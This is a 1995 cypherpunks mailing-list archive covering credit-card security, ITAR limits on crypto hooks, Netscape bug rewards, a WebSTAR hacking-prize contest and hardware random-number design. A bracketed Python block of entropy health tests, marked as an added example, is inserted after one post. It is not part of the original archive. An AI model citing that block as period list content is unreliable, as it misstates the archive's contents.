Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 15 Nov 1995 13:26:01 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511150512.VAA08514@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Greg Broiles wrote:

> Detweiler writes:
> 
> > the argument goes like this: secure credit card number uploading
> > schemes (such as in Netscape) are not important on the internet because 
> > credit card numbers are already insecure. you give them to low-wage
> > workers all the time who might steal the number from you anyway.
> 
> > there are a lot of fallacies with this. I find this to be a key
> > cypherpunk issue, and I hope others will agree to the point of
> > trying to attack this fallacy through letters to the editor,
> > debates, etc., because it seems to rationalize weak security.
> 
> You're only reproducing half of the debate, which goes like this:

Actually, this is not quite correct.  There is a difference if I give a
credit card to *one* person, or if I give the message containing that
number to a chain of twenty or thirty strangers to get my information to
the one person I want to have that information. 

We're back to handing your card to the neighbour, who gives it to the 
doorman, who flags the cab and gives it to a cabbie, who then drives 
cross town and gives it to another doorman, who then etc, etc.

Something completely different than the long bomb from the quarterback.

Our potential interception points have increased substantially ... and we
have absolutely no audit trail to figure out who *might* have scarfed the
card. 

I guess the average customer won't care.  His loss is limited to $50.

But some of us who try to live in the real world wonder how long that'll
last.  Can we measure the life of it in a matter of weeks??  Or months? 

> Businesses/customers won't trust the Internet for commerce, because it's
> not perfectly secure.
> 
> And then others go on to point out that businesses and consumers do
> business every day using commerce tools whose security features are weak
> to nonexistent. 

Hmmm ... maybe we'll even get a whole new industry going ... don't
ya think??  Maybe we can create a whole new set of risks which are
additive to those we already have.  Maybe every petty grifter might trade
in his very own credit card number and simply claim that their credit card
got stolen over the internet. 

Just disappeared into the anonymous aethyr ... the one without an audit
trail ... but my loss is limited to $50, right??

I guess other people understand systems much, much, more than I do.  I
guess that the NY Times is right ... it won't change the loss rate for the
card companies, at all ... nope ... won't create a new problem ... naahh
... the public wouldn't actually take advantage of holes like this in the
system. 

Nope, no sirreee ...  

Give your head a shake.




Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Wed, 15 Nov 1995 05:38:17 +0800
To: James Black <black@sunflash.eng.usf.edu>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>
Message-ID: <199511142110.NAA28546@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995 14:49:23 -0500 (EST), you wrote:

>Hello,
>
>On Tue, 14 Nov 1995, Jeff Barber wrote:
>
>> s1113645@tesla.cc.uottawa.ca writes:
>> 
>> Does anyone know the ostensible justification for this?  What section of
>> the ITARs do they point to when they say "this is illegal"?  I've perused
>> an online copy of ITAR (no, I haven't read all of it -- I have other
>> things I want to do this year :-), but I can't find a section that could
>> be construed to support this contention.
>
>  I scanned through the ITAR, and I agree that there doesn't seem to be 
>anything about hooks that are illegal, but the NSA does have the 
>authority to protect whatever threatens national security.  If they are 
>over-stepping their bounds who is going to push it to court to find out, 
>as that is where the decision would have to be made (very expensive).
>  Take care and have fun.

The ITAR talks about crypto components, the government is interpreting
this as software that allows plug-in encryption.



Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No."
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 15 Nov 1995 10:52:04 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511150156.RAA18623@netcom21.netcom.com>
Message-ID: <9511150233.AA31764@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



The article misses the point. What the credit card cos are worried about is the 
disclosure of credit card numbers in bulk by merchant servers connected 
incompetently to the internet. The issue of customer exposure is a non issue, 
regulation E means that there is no customer risk.

There is in fact a distinction between "card present" and "card not present"
transactions. AMEX cards for example have an extra group of four digits which 
are not part of the embossed card number. They are used as additional 
verification to prove that a card is present. In general a merchant pays a lower 
commission for card present transactions to reflect the reduced risk.

The point of the article is that people running round like headless chickens 
because of Internet insecurity miss the main point, the security is no worse 
than the real world we just have rather higher standards.

What it does mean is that people like myself will be able to make a nice living 
explaining to people what security issues to forget and which ones to worry like 
hell about.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 16 Nov 1995 00:24:16 +0800
To: hallam@w3.org
Subject: Re: credit card conventional wisdom
Message-ID: <9511150243.AA14648@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>There is in fact a distinction between "card present" and "card not present"
>transactions. AMEX cards for example have an extra group of four digits which 
>are not part of the embossed card number. They are used as additional 
>verification to prove that a card is present.

So the run-it-through-the-mechanical-device is treated as card not present?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 16 Nov 1995 00:24:34 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: credit card conventional wisdom
In-Reply-To: <9511150243.AA14648@sulphur.osf.org>
Message-ID: <9511150255.AA01940@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



For AMEX, it appears not! Or at least there is a requirement for the 
assistant to enter the extra four digits in certain cases. The precise
nature of the circumstance when they are required to be card present I
am not sure (in fact I would bet they vary).

There is no reason why the magnetic strip should necessarily be considered
to be card present. It is easy enough to forge, readers need not be
attended (eg petrol pumps).

I'm not sure on the exact rules, I don't pay $80 for the privilege of having
plastic!

The main point I was responding to was the "add information to card that
is not on the stripe" point of the original poster.



	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Karen E Cooper <kecooper@maroon.tc.umn.edu>
Date: Wed, 15 Nov 1995 12:22:32 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography MPLS Book Release Party
In-Reply-To: <30a9659e030b002@maroon.tc.umn.edu>
Message-ID: <30a967be0ba7002@maroon.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


APPLIED CRYPTOGRAPHY 2nd Ed. BOOK RELEASE PARTY

Please come out and meet author Bruce Schneier at a drinks and hors
d'oeuvre reception to celebrate the publication of Applied Cryptography,
2nd Ed. 

The reception is in Minneapolis, Minnesota on Wednesday, 29 November, 1995, 
from 5:00 to 8 pm.

RSVP for directions and specifics.


Karen Cooper
(612) 823-1098
kecooper@maroon.tc.umn.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Wed, 15 Nov 1995 14:55:01 +0800
To: cypherpunks@toad.com
Subject: Re: CSE gets flak on TV
In-Reply-To: <Pine.3.89.9511141646.A37652-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511142245.ZM12784@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 14, 16:47, s1113645@tesla.cc.uottawa.ca wrote:
> Subject: CSE gets flak on TV
> For those who care, the Communications Security Establishment has been
> getting some flak for spying on Mex. during NAFTA talks and on Korea to
> help us sell Can. nuke reactors:

Folks who are interested in the CSE should also check out the
"unofficial CSE home page" at
http://watserv1.uwaterloo.ca/~brobinso/cse.html

There is also a very dull "official" home page at
http://www.cse.dnd.ca


-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.5.1.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 16 Nov 1995 06:55:49 +0800
To: cypherpunks@toad.com
Subject: Re: BBS Generator Code Needed & crypto++
In-Reply-To: <9511141749.AA28423@zip_master2.sbi.com>
Message-ID: <Pine.3.89.9511142310.A14556-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 14 Nov 1995, David Macfarlane wrote:

> Wei Dai's crypto++ has BBS, if you can find a copy.

Try:
(quoting Wei Dai) 

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_?????/libraries/crypto11.zip
 
where ????? is in ftp://ftp.csn.net/mpj/README
 
I encourage people to use this library in commercial as well as 
shareware/freeware products.  You don't have to pay me a cent, but 
don't forget about the patents.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 15 Nov 1995 08:08:44 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511142357.A2503-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Raph Levien wrote:

> I move we file a CJR on some suitable software with crypto hooks.

If you want to get really warped, feel free to file a CJR for Privtool,
it's a mail program with crypto hooks but no crypto, and has the added
advantage of being written outside the US but still illegal to export, as
far as I can tell (certainly it's now on the export-controlled section of 
c2.org).

In fact, maybe I should file one myself, as it's a real pain to have to 
tell non-US users to get it from a non-US site rather than the 'official' 
distribution site at c2.org. Can non-US citizens do these things ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 15 Nov 1995 15:10:54 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFbde-0008zsC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


> > >I think it's 121.1, Category XIII paragraph (b) item (5):
> > >"Ancillary equipment specifically designed or modified for paragraphs (b)
> > >(1), (2), (3), (4) and (5) of this category;"
> > 
> > Question:  What makes computers in general NOT describable by such a
> > paragraph?!?
>
>"specifically designed"?
>
>nathan

That makes it easy:  Just make sure that you also write a compressor or
filter program with similar compatibility, and nobody can argue that the
hooks were SPECIFICALLY DESIGNED for encryption.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 15 Nov 1995 14:02:31 +0800
To: cypherpunks@toad.com
Subject: WebSTAR security challenge. Make $10,000 breaking in a site.
Message-ID: <v02120d02accf288d9174@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


>From TidBITS:

**$10,000 Internet Security Challenge** -- I wrote about the
  WebMaster Macintosh security challenge back in TidBITS-295_ and,
  as expected, no one was able to break WebSTAR's security and claim
  the prize of free passes to the WebEdge conference. Now the stakes
  have increased. Seven companies - StarNine, EveryWare, Maxum,
  ComVista Internet Solutions, WebEdge, Digital Forest, and Westwind
  Computing - have joined forces to offer a more lucrative prize of
  $10,000. The new challenge is similar: you must break WebSTAR's
  security to find information that isn't available to the public
  and report it by midnight on 30-Nov-95. Check out the rest of the
  details online if you are interested. [ACE]

http://challenge.comvista.com/

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 15 Nov 1995 14:14:00 +0800
To: cypherpunks@toad.com
Subject: Secondary Ecash applications on hold
Message-ID: <v02120d03accf2ca386e5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


A few weeks ago, I promised you all to write some scripts that will lay the
groundwork for some of the more unusual applications of Ecash.
Unfortunately, I went straight from one contract to the next and didn't
find the time to work on the scripts.

I am currently in St. Louis, making sure that Ecash makes the impact on
Internet commerce that many of us think it should make. Anyone on this list
that ever thought of opening a shop using Ecash or is interested in Ecash
in general is encouraged to email me at support@marktwain.com and share
their ideas.

TIA,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 15 Nov 1995 18:29:34 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199511151019.CAA18910@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

I know that this is *painfully* dated, and I apologize to the list for
replying to a one month old post, but I felt I had to put some final items
on the record.  And I think that this is still timely ... so ... 


On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> Phil typed:
> > Have things really come to this?  Besides the legal implications of
> > discovering a hole and then selling the information to someone, (who
> > presumably will only want this information for one purpose) where has
> > the attitude of doing for the sake of doing gone?
>
> It's one thing to do good for the sake of doing good.  Most of us do that
> every day by participating in this list.  It's quite another thing to be
> insulted in the process.  I think that Netscape's reward is an insult,

Dr. Frederick B. Cohen has nailed it once again.  He's right. 

But Phil's comments really need to be addressed ... vis-a-vis the
implications of "discovering a hole and selling it".  Phil's hypothetical
is rightfully worrisome, but we should remember it _is_ only a
hypothetical. 

Let's not worry much about hypotheticals.  Perhaps we should worry more
about what in fact IS an ACTUAL, rather than what might possibly be. 

The hand-wringing should be over the existing reactions to publicly
ignored security holes and the ETHICS of the new Internet players.  

The ones who are so very cock-sure of themselves.  So cock-sure, that
they willingly gamble with public security and think that their invasion
of individuals' personal boundaries and privacy is nothing noteworthy. 
That it will just somehow pass. 

My post detailing a structural flaw in Netscape Navigator was announced,
very quietly, to this list OVER ONE MONTH AGO.  And what has been done
about it, by AT&T and/or Netscape??  Nothing. 

AT&T has its reputation attached to this code, as does Deutsche Telecom,
as does Netscape.  The only "action" they've taken is to info-freeload and
then do absolutely, positively, definitely ... nothing. 

Diddly-squat.

No one has taken any action whatsoever.

How would we treat a company ... let's say a construction company that
found out that one of its buildings was unsafe, and then proceeded not to
barricade the complex.  If the company found out that the girders were not
up to the engineered spec, and simply allowed risk and harm to continue. 
If the Company thought it was OK to gamble with people's lives?  Would we
say that the reckless disregard for the public interest merited criminal
sanction?? 

Hopefully, we would.

To attack some hypothetical "information provider" for selling some
"hypothetical" information which a corporation denies is actually of any
value, at all -- nominal, or otherwise -- is an argument that just doesn't
float.  It completely misses the mark. 

> If they think you can find major security bugs in Netscape for as little
> as $1000, they should take the product off the market, or at least stop
> claiming that it offers security.

They should definitely take the product off the market.    

Period.  

They should also stop claiming that it offers any security.  In fact, they
should attach a product warning label, something that says that Netscape
Navigator degrades your inherent safety and security as soon as you use
it. 

That would be the "right thing" to do.  Because that is truthful.

AT&T's "brass" should have used the "Tylenol" or "Perrier" crisis
management model on this one.  Rather than, "The stick your head in the
sand like an ostrich" model.  Or the "Gee, maybe if I close my eyes, and 
pull the covers over my head, the boogie-man will go away" school. 

Someone has to call them on their collective jump into the World of
Management by Denial.

The issue here isn't the so-called "reward", the focus should rightly be
placed on who knew what and when they knew it, and what they did as a
consequence.  The issue is whether these Goliath Companies, happily roll
the dice when public safety and security is on the line. 

It's that simple.  A real no brainer.

> >  Has Netscape been pestering
> > security experts on the net for free work?  Have they been plaguing
> > people or lists with email asking the net to do their jobs?
>
> They do far worse.  They claim security when they don't have it, and
> when the cypherpunks demonstrate the false claims, Netscape offer
> insulting future tribute.  I think that if they are sincere, they should
> reward the individuals who found the last few holes with $25,000 each,
> and show that they really mean business.

Actually, they said that they want to "harness" the power of the internet,
and in return offered a chance to be enrolled in a contest for a mug or a
T-shirt, or maybe ... if they ... in "their sole discretion" thought
something was a security bug, then they'd offer a $1,000 award. 

Not *pestering* security experts, but simply asking them to sorta, kinda
take a look at the product.  Look, and help build the Companies' fortunes,
while the "Creative" talent might get a nice Netscape mug for their
troubles. 

This is what Netscape DID, but this isn't the true issue.

The true issue is a question of attitudes, not of monetary compensation. I
really don't care if Netscape or AT&T offer gold stars and nice little
pats on the head, or offer many "millions" or offer $25,000, or expect the
world's foremost security auditors to work for T-shirts or a bitta
Crackerjack. 

That's not the issue.

I just don't believe that any company should on the one hand represent
that they have a secure product -- that they actually care about security
 -- while on the other hand they take their black-box code and say that
anyone who brings an error to their attention -- a critical security flaw
 -- agrees implicitly to make the report the Company's property -- property
to be used at the Company's sole discretion. 

A security review audit is first and foremost for the benefit of the end
users.  The audit is not so that the company can use the information for
its own purposes.  The information is not there so that the company can
use a confidential auditor's report on security flaws to spy on their own
customers, and it's certainly not there to enable a code cover-up.

Hell, these firms try to cover up even when the information is PUBLIC, let
alone when it's given to them in private.  And the crying and whining is 
unbecoming, because the attempt at private communication was made.

It was made with both Netscape, and with AT&T.

> > The ironic part is the people who have been the most successful at
> > finding bugs are not the ones who are demanding money for it!
>

You're right.  The people who find the bugs simply ask that the public
interest be served ... that the Network's interest be served, and that the
National interest be served. 

Defective product serves no one, and adding an object to an existing
computing environment under the rubric of an experimental data type serves
no-one.  Correction, it serves no-one except those who would rather see
harm come to the public. Those who value and place their own self-interest
above that of others. 

And the consequences be damned.

> The ironic part is that a company that claims to have a "secure" method
> for using credit cards on the Internet thinks that their security is so
> weak that it only takes $1000 to find a major hole.

The ironic part is that even once a critical design flaw is identified, no
action is taken by anyone -- even when the person who finds it demands no
money whatsoever for it -- the real irony is that the press is silent, and
so is the company. 

See no evil, speak no evil, hear no evil.

Let the harm and damage continue ... by my calculation, it's been one
month already ... shall we maybe try now for two?? 

I don't think so. 

> --
> -> See: Info-Sec Heaven at URL http://all.net
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 16 Nov 1995 06:04:18 +0800
To: cypherpunks@toad.com
Subject: encryption in BeOS kernel
Message-ID: <199511150526.FAA12374@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


This also corresponds to IBM's development of its "IPC"
"network appliance" (also due out 1Q '96) to challenge
the desktop PC for Internet use.

It parallels as well IBM's reported work on a "Microkernal"
which may feature encryption, authentication and security
hooks.

IBM's IPC will probably use an Intel chip (WSJ today).

Which leads to speculation:

Would chip-fabbers covertly Fortezza chips to get export ok?

Motorola, HP, IBM, others long-linked to USG are ever ready 
to gobble international market share in the national
interest.

Intel, sure, world-class fab plants planting chip-secrets.

Wonder if that key escrow protest to Gore is a cover for
economic actions authorized by National Security D&D?












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 15 Nov 1995 21:04:43 +0800
To: pc@pdj2-ra.F-REMOTE.CWRU.Edu
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511151255.AA26027@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


:    It kind of sickens us that we had to do it, but so be it. 
:    
:    Patches that re-implement the PEM code may be available at a foreign
:    site soon. If it does show up, we'll point to it - that can't be
:    illegal! 

I see no reason why they should not be as ``illegal'' as the
crypto-with-a-hole silliness.  Pointing to software is a pretty
effective way of disclosing it, and disclosing cryptographic
software--apparently including holes--to foreign persons without a
license is a violation of the ITAR.

Of course, the ITAR itself is illegal as it applies to cryptographic
software, but I agree that one does not want to be the defendant in a
criminal case based on those unconstitutional provisions.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Nov 1995 22:26:10 +0800
To: cypherpunks@toad.com
Subject: MED_vac
Message-ID: <199511151416.JAA13881@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-15-95. NYPaper Page One:


   "When Patients' Records Are Commodities for Sale."

      Individual medical records, carrying more sensitive
      personal information than ever before, are increasingly
      being gathered and stored by the tens of thousands in
      commercial databanks maintained by institutions like
      hospital networks, health maintenance organizations and
      drug companies. And although there is a Federal law that
      protects the privacy of video rental lists, private
      medical information is being bought and sold freely.

      The issue of medical privacy touches virtually everyone.
      "It is true to say that if you know a person's history
      of health problems, then you know more about that person
      than you would with any other data," said Lawrence O.
      Gostin, a professor at Georgetown University Law Center.
      And as medical records start including new genetic
      information that can predict diseases likely to show up
      in years to come, they will be able to reveal "not just
      health histories, but health futures," Mr. Gostin said.

      Yesterday hearings were held on a bill called the
      Medical Records Confidentiality Act, intended to
      establish uniform Federal rules for the use and
      disclosure of health information.

      Although the bill details procedures for obtaining
      consent, it also establishes a formidable list of
      exceptions to this requirement. The police, health
      oversight agencies, health information services, public
      health offices and medical researchers are among those
      allowed to obtain records of an identified patient
      without that person's consent and, in many cases without
      notification.


   MED_vac  (15 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 16 Nov 1995 03:22:50 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Hardware-random-bits interface
Message-ID: <199511151519.JAA12151@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 PM 11/14/95 -0800, you wrote:
>I've been thinking about physically random bits recently, so
>I'd like to offer a simple, easily implementable interface to a
>source of such bits, along with a design sketch using a common
>radio receiver chip as the noise source.

It sounds like a fairly decent idea, _as long as you shield the bejeebers
(technical term :-) out of it_. Otherwise, anybody with a signal generator
could skew your numbers however they saw fit: any component lead can act as
an antenna, no matter how small that lead is.

One way to handle it would be to lay it out as a multi-layer PCB, with the
signal & power traces inside, and ground plane on the outer layers. Then
enclose the circuit components inside a shielding enclosure (mu-metal would
be good) mounted to the PCB, then tuck the entire assembly inside another
enclosure (small aluminum box for example, also connected to ground).

Of course, there would be easier ways to fabricate it, but they would just
make the shielding that much more difficult to implement.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148
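
[Added example, not part of the post above and not code from any poster on the list: a software check that complements the shielding advice by flagging a noise source whose output has been skewed by a coupled signal. It uses the repetition count and adaptive proportion tests in the style of NIST SP 800-90B; the Gaussian-noise-plus-sine model, the amplitudes, the seed and all function names are constructed assumptions.]

```python
"""Continuous health tests on raw noise-source bits (added example)."""
import math
import random

ALPHA_EXP = 20   # assumed false-alarm probability per test: 2**-20
WINDOW = 1024    # assumed window size for binary samples


def rct_cutoff(h_bits=1.0):
    """Run length a source claiming h_bits of entropy per sample should not reach."""
    return 1 + math.ceil(ALPHA_EXP / h_bits)


def apt_cutoff(window=WINDOW):
    """Smallest count c with P(Binomial(window, 1/2) >= c) <= 2**-ALPHA_EXP."""
    total = 1 << window
    limit = total - (total >> ALPHA_EXP)   # (1 - alpha) * 2**window, exact
    cumulative = 0
    for k in range(window + 1):
        cumulative += math.comb(window, k)
        if cumulative >= limit:
            return k + 1
    return window + 1


def repetition_count_fails(bits, cutoff):
    """True if any value repeats `cutoff` or more times in a row."""
    run, prev = 0, None
    for b in bits:
        run = run + 1 if b == prev else 1
        prev = b
        if run >= cutoff:
            return True
    return False


def adaptive_proportion_fails(bits, cutoff, window=WINDOW):
    """True if, in any full window, the window's first value occurs >= cutoff times."""
    for start in range(0, len(bits) - window + 1, window):
        block = bits[start:start + window]
        if block.count(block[0]) >= cutoff:
            return True
    return False


def sample_bits(n, pickup_amplitude, period, seed):
    """Constructed model: comparator on unit Gaussian noise plus a sine pickup.

    pickup_amplitude is in units of the noise standard deviation; 0.0 stands
    for a perfectly shielded circuit.
    """
    rng = random.Random(seed)
    bits = []
    for t in range(n):
        noise = rng.gauss(0.0, 1.0)
        pickup = pickup_amplitude * math.sin(2 * math.pi * t / period)
        bits.append(1 if noise + pickup > 0 else 0)
    return bits


def health_check(bits):
    """Run both tests with cutoffs for a source claiming 1 bit of entropy per bit."""
    return {
        "repetition_count_fail": repetition_count_fails(bits, rct_cutoff()),
        "adaptive_proportion_fail": adaptive_proportion_fails(bits, apt_cutoff()),
    }


# Constructed sample data: same seed, with and without a slow external pickup.
SHIELDED = sample_bits(4096, 0.0, 4096, seed=1995)
COUPLED = sample_bits(4096, 4.0, 4096, seed=1995)

if __name__ == "__main__":
    print("cutoffs :", rct_cutoff(), apt_cutoff())
    print("shielded:", health_check(SHIELDED))
    print("coupled :", health_check(COUPLED))
```

[These tests only catch gross failures such as a pickup that dominates the noise; a weak interferer can bias the stream without tripping either cutoff, so they do not replace the shielding described in the post.]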






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 15 Nov 1995 23:54:17 +0800
To: cypherpunks@toad.com
Subject: RSA T-shirt
Message-ID: <199511151531.JAA12350@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


FWIW, I finally got a chance to see if my barcoded RSA-in-perl t-shirt would
actually scan - and it did! It took a bit of fiddling, but it was scannable
using one of those hand-held CCD barcode readers.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Wed, 15 Nov 1995 23:01:56 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511150156.RAA18623@netcom21.netcom.com>
Message-ID: <9511151447.AA10433@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue Nov 14, 1995, Vladimir Z. Nuri wrote:

> attempts to get secure credit card number transfer on the
> internet are not an end in themselves. they are the first
> steps toward an entirely new transaction system. those who
> see a single step and criticize it as feeble in the
> context of past systems are missing the point and
> apparently can't think past the present nanosecond of
> their lives.

You'll have a hard time convincing folks that they need something
better than what works perfectly well today.

Here's another point that I didn't see in your list.  Today
it might be just as safe to send your CC# over the internet
as giving it to a clerk, etc.  This is mostly because the
number of CC#'s sent over the net vs the whole traffic is
small.  It is therefore not very cost effective to try to
steal credit card numbers over the net vs other means
(searching through dumpsters, taping a phone line near LL
Bean, etc.).  If CC# purchases became common over the net,
it would become much more valuable to try to steal them from
the net and more people would.  It would then become much
less secure, not for any technical reason but because there
will be more crooks exploiting the existing flaws.

Where is it most common to steal cellular phone id's (I'm
not sure what they are called, but the id's sent that
someone can steal to build a forged cell phone)?  At
airports.  Why?  Because more cell phones are used there,
everyone uses one as they get on or off a plane.  If you
want to troll for id's, go to where there are many.

Howard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 15 Nov 1995 23:26:44 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9511151215.AA20714@all.net>
Message-ID: <199511151510.KAA23996@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> On a closely related vein, Sun has announced that they are severely
> limiting some functions in HotJava - from Risks-17-45:

   The problems found however, were not fundamental flaws in
the Java language itself nor in the Java virtual machine. As
I've said many times, you can pretty much rip any i/o capability
out of Java by changing the runtime class libraries. If someone
finds a way to defeat the Java bytecode verifier/class loader
and replace a class in java.* with a more powerful one, then that
will be really significant.

> I had a rather lengthy discussion with a gentleman from Sun at the CSI
> conference last Tuesday night, and this announcement follows many of the
> things we discussed very closely.  This kind of consistency between what
> people say and what the company published is refreshing, and it restores
> my faith in Sun's desire to do things well.  Of course there are still
> some problems left unresolved:

[denial of service problems deleted. ]
> 
> Similarly, if your HotJava allows an insecure Postscript implementation
> to interpret postscript files, you're still beat.

